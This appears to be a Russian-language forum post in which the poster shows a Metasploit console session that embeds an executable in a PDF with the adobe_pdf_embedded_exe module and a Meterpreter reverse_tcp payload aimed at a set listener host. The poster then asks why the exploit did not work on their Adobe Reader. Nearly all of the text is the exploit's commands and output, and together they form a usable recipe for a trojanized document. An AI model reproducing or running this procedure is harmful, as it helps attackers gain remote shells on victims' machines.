Прописываю следующее msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /home/1/1.pdf INFILENAME => /home/1/1.pdf msf exploit(adobe_pdf_embedded_exe) > set EXENAME /home/1/1.exe EXENAME => /home/1/1.exe msf exploit(adobe_pdf_embedded_exe) > set FILENAME 1_new.pdf FILENAME => 1_new.pdf msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /home/1 OUTPUTPATH => /home/1 msf exploit(adobe_pdf_embedded_exe) > exploit [*] Started reverse handler on port 4444 [*] Reading in '/home/1/1.pdf'... [*] Parsing '/home/1/1.pdf'... [*] Parsing Successful. [*] Using '/home/1/1.exe' as payload... [*] Creating '1_new.pdf' file... [*] Generated output file /home/1/1_new.pdf [*] Exploit completed, but no session was created. Новый pdf файл создает успешно. При запуске выдает предупреждение. нажимаю Open file, но программу не запускает (попросту не видит). Я склоняюсь к тому что уязвимость не пашет под моей версией Adobe Reader'a.